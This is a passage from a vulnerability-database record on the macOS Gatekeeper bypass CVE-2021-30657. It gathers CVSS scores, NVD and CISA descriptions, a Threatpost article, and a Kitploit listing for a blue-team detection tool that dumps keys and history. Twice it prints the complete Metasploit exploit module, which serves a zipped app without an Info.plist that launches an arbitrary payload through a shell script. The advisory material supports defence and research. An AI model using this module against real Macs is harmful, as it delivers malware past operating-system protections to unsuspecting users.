"exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-09-22T00:00:00", "id": "AKB:29A92D92-7F52-42AF-809D-8666D33E0DF2", "href": "https://attackerkb.com/topics/MrqDl2L0CZ/cve-2021-30657-malicious-applications-may-bypass-gatekeeper-checks", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "githubexploit": [{"lastseen": "2023-05-27T15:44:31", "description": "# CVE-2021-30657\nA simple POC for CVE-2021-30657 affecting MacOS...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-11-07T18:33:35", "type": "githubexploit", "title": "Exploit for Vulnerability in Apple Mac Os X", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-09-18T08:55:09", "id": "285A3734-8E7C-544D-B792-62E544C8ECE8", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "privateArea": 1}], "prion": [{"lastseen": "2023-08-16T03:04:15", "description": "A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-09-08T15:15:00", "type": "prion", "title": "CVE-2021-30657", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-07-12T17:42:00", "id": "PRION:CVE-2021-30657", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-30657", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Apple macOS contains an unspecified logic issue in System Preferences that may allow a malicious application to bypass Gatekeeper checks.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Apple macOS Unspecified Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-30657", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "threatpost": [{"lastseen": "2021-04-27T16:21:46", "description": "Apple patched a zero-day vulnerability in its MacOS that can bypass critical anti-malware capabilities and which a variant of the notorious Mac threat Shlayer adware dropper already has been exploiting for several months.\n\nSecurity researcher [Cedric Owens](<https://twitter.com/cedowens>) first discovered the vulnerability, tracked as [CVE-2021\u201330657](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30657>) and patched in macOS 11.3, [an update](<https://support.apple.com/en-us/HT212325>) dropped by Apple on Monday. The vulnerability is particularly perilous to macOS users because it allows an attacker to very easily craft a macOS payload that goes unchecked by the strict security features built into the OS specifically to keep malware out.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/21082808/PromoPic2-300x138.png)](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>)\n\nDownload \u201cThe Evolution of Ransomware\u201d to gain valuable insights on emerging trends amidst rapidly growing attack volumes. Click above to hone your defense intelligence!\n\n\u201cThis bug trivially bypasses many core Apple security mechanisms, leaving Mac users at grave risk,\u201d warned Patrick Wardle, an Apple security expert who runs the [Objective-See](<https://objective-see.com/>) Mac security tool site, in [a blog post](<https://objective-see.com/blog/blog_0x64.html>) Monday. Owens asked Wardle to do a deeper technical dive of the bug after his initial analysis and report on it.\n\nOwens said he tested his exploit for the bug successfully on macOS Catalina 10.15\u2013specifically on 10.15.7\u2013and on versions of macOS Big Sur before Big Sur 11.3, submitting a report to Apple about the vulnerability on March 25.\n\n\u201cThis payload can be used in phishing and all the victim has to do is double-click to open the .dmg and double-click the fake app inside of the .dmg\u2013no pop ups or warnings from macOS are generated,\u201d Owens [wrote in a post](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>) on his Medium blog Monday.\n\n## **Vulnerability Deep Dive**\n\nWardle\u2019s report takes an extensive technical look at the bug, finding that CVE-2021\u201330657 could bypass three key anti-malware detections present in macOS\u2014File Quarantine, Gatekeeper and Notarization, he wrote in his post.\n\nApple has always considered itself a stickler for security with a focus on locking down its proprietary hardware products against malware\u2013which makes the existence of this particular zero-day bug somewhat ironic. The three features that the flaw could bypass actually show a steady progression of macOS security, with the company reinforcing each feature to make the OS inherently less penetrable, Wardle explained.\n\nFile Quarantine, was introduced in OSX Leopard (10.5) in 2007, provides the first warning to the user that requires explicit confirmation before allowing a newly downloaded file to execute, he wrote. However, since users kept ignoring the warning and letting malware pass through, Apple introduced Gatekeeper in OSX Lion (10.7) as a feature built atop File Quarantine. Gatekeeper checks the code-signing information of downloaded items, blocking those that do not adhere to system policies, Wardle said.\n\nNotarization is the newest security feature of the three, introduced in macOS Catalina (10.15) and aimed at once again preventing users from sabotaging themselves. The feature introduced Application Notarization to ensure that Apple has scanned and approved all software before it is allowed to run, according to the post.\n\nBy being able to bypass all of them, the zero-day bug, then, provides a triple threat that basically gives malware a free pass into the system. How the bug does this is by setting into motion a logic bug in macOS\u2019 underlying code so that it mischaracterizes certain application bundles and skipps the usual security checks, Wardle explained.\n\nThe key to how the bug works lies in the way macOS apps identify files, which is not as single entities but instead as bundles of different files. These bundles include a list of properties that tell the app where specific files it needs to use are located.\n\nBy taking out the property file and creating a bundle in a certain way, threat actors can exploit the flaw to be misrecognized by the OS and thus pass through the security checks, Wardle said in his post.\n\n\u201cAny script-based application that does _not_ contain an Info.plist file will be misclassified as \u2018not a bundle\u2019 and thus will be allowed to execute with no alerts nor prompts,\u201d he wrote.\n\n## **Exploitation in the Wild**\n\nOnce he identified how the bug works, Wardle asked researchers from Mac security company Jamf to see if anyone had already exploited it in the wild. Turns out, a variant of malware already quite familiar to Mac users has been abusing the vulnerability since at least Jan. 9., according to a [post Monday](<https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/>) on the Jamf Blog.\n\n\u201cThe Jamf Protect detections team observed this exploit being used in the wild by a variant of the Shlayer adware dropper,\u201d according to the post by Jamf detections lead [Jaron Bradley](<https://twitter.com/jbradley89>), who added that it is nearly identical to a malware sample previously identified by [Intego Security](<https://www.intego.com/mac-security-blog/new-mac-malware-reveals-google-searches-can-be-unsafe/>).\n\nThe major difference, however, is that the variant has been repackaged to use a format necessary for carrying out the MacOS Gatekeeper bypass vulnerability, he explained, going into detail about how the attacker abused the flaw.\n\nShlayer and the macOS already have quite a history, as the [stealthy adware](<https://threatpost.com/shlayer-mac-malware-extra-sneakiness/156669/>) is known as the [No. 1 threat to Macs](<https://threatpost.com/shlayer-mac-youtube-wikipedia/152146/>). Indeed, Shlayer was found [slipping through the Notarization](<https://threatpost.com/apple-accidentally-notarizes-shlayer-malware/158818/>) feature as recently last August disguised as Adobe Flash Player updates, something Wardle co-discovered with researcher [Peter Dantini](<https://twitter.com/PokeCaptain>) at the time.\n\nUnderstandably, Apple and all the security researchers who took a look at the zero-day vulnerability are advising that macOS users update their systems immediately to avoid falling victim to any existing exploits for it.\n\n**Join Threatpost for \u201c**[**Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**\u201d \u2013 a LIVE roundtable event on**[** Wed, May 12 at 2:00 PM EDT**](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinarhttps://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)**. Sponsored by Zoho ManageEngine, Threatpost host Becky Bracken moderates an expert panel discussing best defense strategies for these 2021 threats. Questions and LIVE audience participation encouraged. Join the lively discussion and [Register HERE](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>) for free. **\n", "cvss3": {}, "published": "2021-04-27T11:45:01", "type": "threatpost", "title": "Apple Patches Zero-Day MacOS Bypass Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-30657"], "modified": "2021-04-27T11:45:01", "id": "THREATPOST:7C630642BA0CC259B4DF61820DA05235", "href": "https://threatpost.com/apple-patches-macos-bug-bypass-defenses/165611/", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-10-13T22:35:55", "description": "A vulnerability exists in Apple macOS. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2022-09-18T00:00:00", "type": "checkpoint_advisories", "title": "Apple MacOS Authentication Bypass (CVE-2021-30657)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-09-18T00:00:00", "id": "CPAI-2021-1277", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "kitploit": [{"lastseen": "2023-05-27T15:15:30", "description": "[![](https://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/w640-h206/Swift-Attack_1_swiftattack-792260.png)](<https://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png>)\n\n \n\n\nUnit tests for [blue teams](<https://www.kitploit.com/search/label/Blue%20Teams> \"blue teams\" ) to aid with building detections for some common macOS [post exploitation](<https://www.kitploit.com/search/label/Post%20Exploitation> \"post exploitation\" ) methods. I have included some post [exploitation](<https://www.kitploit.com/search/label/Exploitation> \"exploitation\" ) examples using both [command line](<https://www.kitploit.com/search/label/Command%20Line> \"command line\" ) [history](<https://www.kitploit.com/search/label/History> \"history\" ) and on disk binaries (which should be easier for detection) as well as post exploitation examples using API calls only (which will be more difficult for detection). The post exploitation examples included here are not all encompassing. Instead these are just some common examples that I thought w ould be useful to conduct unit tests around. I plan to continue to add to this project over time with additional unit tests.\n\nAll of these tests run locally and return results to stdout (i.e., Swift-Attack does not connect to a server).\n\n \n\n\n**Steps:** \n\n\n> git clone <https://github.com/cedowens/Swift-Attack>\n\n * Ensure you have installed swift and developer tools (can install from the mac app store)\n\n * open the xcodeproj file in XCode\n\n * Build in XCode\n\n * The compiled app will be dropped to something like: _**Users//Library/Developer/Xcode/DerivedData/Swift-Attack-[random]/Build/Products/Debug/Swift-Attack.app**_\n\n * cd to the directory above\n\n * cd Swift-Attack.app/Contents/MacOS (you can run the macho from here or copy it elsewhere and run...up to you)\n\n * grant the Swift-Attack macho full disk access to ensure you can run all of the tests without TCC issues\n\n * run the following to remove any quarantine attributes:\n\n> xattr -c Swift-Attack\n\n * Run Swift-Attack:\n\n> ./Swift-Attack -h\n\n[](<https://github.com/cedowens/Swift-Attack/blob/main/swiftattack.png> \"Unit tests for blue teams to aid with building detections for some common macOS post exploitation methods. \\(7\\)\" )[![](https://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/w640-h206/Swift-Attack_1_swiftattack-792260.png)](<https://2.bp.blogspot.com/-aWl6BmFOZho/YNDQ4oMVGeI/AAAAAAAAcic/FaLbGO4M5tMlWl1o3EnecgPw5Y6Yr0NyACK4BGAYYCw/s1600/Swift-Attack_1_swiftattack-792260.png>)\n\n \n**Usage:** \n\n\nYou can run Swift-Attack with a single option or multiple options\n\n> ./Swift-Attack [option1] [option2]...\n\n * I also included a simple macro.txt file (unobfuscated) for testing parent-child relationships around office macro executions on macOS. I did not obfuscate it since the focus is on parent-child relationship visibility/detection. If you want to test with an obfuscated macro, I have a repo at github.com/cedowens/MacC2 that contains an obfuscated macro.\n\n * I also did not include any persistence items, since in my opinion it is best to just clone and test persistence using Leo Pitt's persistent JXA repo <https://github.com/D00MFist/PersistentJXA>. This repo is by far the most comprehensive and current repo that I know of for macOS persistence.\n\n * I recently ported some of the PersistentJXA repos over to Swift: <https://github.com/cedowens/Persistent-Swift>\n\n \n**Unit Tests Included:** \n\n\n * Prompt using osascript binary\n\n * Prompt via API calls\n\n * Clipboard dump using osascript binary\n\n * Clipboard dump using API calls\n\n * Screenshot using screencapture binary\n\n * Screenshot using API calls\n\n * Shell commands\n\n * Dumping zsh history\n\n * Security tool enumeration\n\n * Grabbing system info using osascript binary\n\n * Grabbing system info via API calls\n\n * Dumping ssh, aws, gcp, and azure keys on disk\n\n * Dumping browser history (Chrome, Safari, Firefox)\n\n * Dumping Quarantine history\n\n * Office Macro: I included a simple office macro that connects to local host. Note: the macro will invoke curl to make a GET request using python to <http://127.0.0.1/testing> when executed by clicking the \"Enable Macros\" button. This will allow you to test detections for parent-child relationships around macro execution. Note: this simple test does not include any obfuscation, since the test is really more geared towards parent-child relationships. You can use another repo of mine at <https://github.com/cedowens/MacC2> to test with obfuscated macros. To use, just simply paste the contents of \"macro.txt\" into an office Doc, save as a macro enabled document or as 97-2004 document format (ex: .doc, .xls, etc.), and click \"Enable Macros\" when opening the doc to execute. \n\n * Installer Package: I included TestInstaller.pkg file to test for detections around a basic installer package. This installer package includes a preinstall script which runs in bash and drops com.simple.agent.plist to /Library/LaunchDaemons/ and drops test.js (simple popup prompt) to /Library/Application Support/. The com.simple.agent.plist file simply runs osascript against /Library/Application Support/test.js. It also includes a postinstall script which runs in bash and loads the com.simple.agent.plis using launchctl load. While holding the Control button click Open on TestInstaller.pkg to run it. TestInstaller.pkg will drop the aforementioned files as root.\n\n * CVE-2021-30657 Bypass Payloads: Two sample payloads (both make curl requests to localhost when detonated) to test two different types of payloads that abuse cve-2021-30657. More info here: <https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>\n\n \n \n\n\n**[Download Swift-Attack](<https://github.com/cedowens/Swift-Attack> \"Download Swift-Attack\" )**\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-06-22T12:30:00", "type": "kitploit", "title": "Swift-Attack - Unit Tests For Blue Teams To Aid With Building Detections For Some Common macOS Post Exploitation Methods", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-06-22T12:30:00", "id": "KITPLOIT:8409423888936671546", "href": "http://www.kitploit.com/2021/06/swift-attack-unit-tests-for-blue-teams.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdt": [{"lastseen": "2023-05-27T14:46:45", "description": "This Metasploit module serves an OSX app (as a zip) that contains no Info.plist, which bypasses gatekeeper in macOS versions prior to 11.3. If the user visits the site on Safari, the zip file is automatically extracted, and clicking on the downloaded file will automatically launch the payload. If the user visits the site in another browser, the user must click once to unzip the app, and click again in order to execute the payload.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-05-08T00:00:00", "type": "zdt", "title": "macOS Gatekeeper Check Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2021-05-08T00:00:00", "id": "1337DAY-ID-36216", "href": "https://0day.today/exploit/description/36216", "sourceData": "#\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS Gatekeeper check bypass',\n 'Description' => %q{\n This module serves an OSX app (as a zip) that contains no Info.plist, which\n bypasses gatekeeper in macOS < 11.3.\n If the user visits the site on Safari, the zip file is automatically extracted,\n and clicking on the downloaded file will automatically launch the payload.\n If the user visits the site in another browser, the user must click once to unzip\n the app, and click again in order to execute the payload.\n },\n 'License' => MSF_LICENSE,\n 'Targets' => [\n [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-03-25',\n 'Author' => [\n 'Cedric Owens', # Discovery\n 'timwr' # Module\n ],\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2021-30657'],\n ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],\n ['URL', 'https://objective-see.com/blog/blog_0x64.html'],\n ]\n )\n )\n register_options([\n OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app'])\n ])\n end\n\n def check_useragent(user_agent)\n return false unless user_agent =~ /Intel Mac OS X (.*?)\\)/\n\n osx_version = Regexp.last_match(1).gsub('_', '.')\n mac_osx_version = Rex::Version.new(osx_version)\n if mac_osx_version >= Rex::Version.new('11.3')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Rex::Version.new('10.15.6')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n else\n print_good \"macOS version #{mac_osx_version} is vulnerable\"\n return true\n end\n return false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request #{request.uri} from #{user_agent}\")\n unless check_useragent(user_agent)\n print_error 'Unexpected User-Agent'\n send_not_found(cli)\n return\n end\n\n app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)\n send_response(cli, app_zip(app_name), { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_name}.zip\\\"\" })\n end\n\n def app_zip(app_name)\n case target['Arch']\n when ARCH_X64\n payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})\n command = \"echo \\\"#{payload_data}\\\" | python & disown\"\n when ARCH_PYTHON\n command = \"echo \\\"#{payload.encoded}\\\" | python\"\n when ARCH_CMD\n command = payload.encoded\n end\n\n shell_script = <<~SCRIPT\n #!/bin/sh\n\n #{command}\n SCRIPT\n\n zip = Rex::Zip::Archive.new\n zip.add_file(\"#{app_name}.app/\", '')\n zip.add_file(\"#{app_name}.app/Contents/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777\n zip.pack\n end\nend\n", "sourceHref": "https://0day.today/exploit/36216", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "packetstorm": [{"lastseen": "2021-05-07T16:10:46", "description": "", "cvss3": {}, "published": "2021-05-07T00:00:00", "type": "packetstorm", "title": "macOS Gatekeeper Check Bypass", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-30657"], "modified": "2021-05-07T00:00:00", "id": "PACKETSTORM:162504", "href": "https://packetstormsecurity.com/files/162504/macOS-Gatekeeper-Check-Bypass.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ManualRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpServer \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'macOS Gatekeeper check bypass', \n'Description' => %q{ \nThis module serves an OSX app (as a zip) that contains no Info.plist, which \nbypasses gatekeeper in macOS < 11.3. \nIf the user visits the site on Safari, the zip file is automatically extracted, \nand clicking on the downloaded file will automatically launch the payload. \nIf the user visits the site in another browser, the user must click once to unzip \nthe app, and click again in order to execute the payload. \n}, \n'License' => MSF_LICENSE, \n'Targets' => [ \n[ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ], \n[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ], \n[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => '2021-03-25', \n'Author' => [ \n'Cedric Owens', # Discovery \n'timwr' # Module \n], \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'Reliability' => [ REPEATABLE_SESSION ], \n'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ] \n}, \n'References' => [ \n['CVE', '2021-30657'], \n['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'], \n['URL', 'https://objective-see.com/blog/blog_0x64.html'], \n] \n) \n) \nregister_options([ \nOptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']) \n]) \nend \n \ndef check_useragent(user_agent) \nreturn false unless user_agent =~ /Intel Mac OS X (.*?)\\)/ \n \nosx_version = Regexp.last_match(1).gsub('_', '.') \nmac_osx_version = Rex::Version.new(osx_version) \nif mac_osx_version >= Rex::Version.new('11.3') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelsif mac_osx_version < Rex::Version.new('10.15.6') \nprint_warning \"macOS version #{mac_osx_version} is not vulnerable\" \nelse \nprint_good \"macOS version #{mac_osx_version} is vulnerable\" \nreturn true \nend \nreturn false \nend \n \ndef on_request_uri(cli, request) \nuser_agent = request['User-Agent'] \nprint_status(\"Request #{request.uri} from #{user_agent}\") \nunless check_useragent(user_agent) \nprint_error 'Unexpected User-Agent' \nsend_not_found(cli) \nreturn \nend \n \napp_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5) \nsend_response(cli, app_zip(app_name), { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_name}.zip\\\"\" }) \nend \n \ndef app_zip(app_name) \ncase target['Arch'] \nwhen ARCH_X64 \npayload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {}) \ncommand = \"echo \\\"#{payload_data}\\\" | python & disown\" \nwhen ARCH_PYTHON \ncommand = \"echo \\\"#{payload.encoded}\\\" | python\" \nwhen ARCH_CMD \ncommand = payload.encoded \nend \n \nshell_script = <<~SCRIPT \n#!/bin/sh \n \n#{command} \nSCRIPT \n \nzip = Rex::Zip::Archive.new \nzip.add_file(\"#{app_name}.app/\", '') \nzip.add_file(\"#{app_name}.app/Contents/\", '') \nzip.add_file(\"#{app_name}.app/Contents/MacOS/\", '') \nzip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777 \nzip.pack \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/162504/osx_gatekeeper_bypass.rb.txt"}], "cve": [{"lastseen": "2023-05-27T14:40:46", "description": "A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks. Apple is aware of a report that this issue may have been actively exploited..", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", 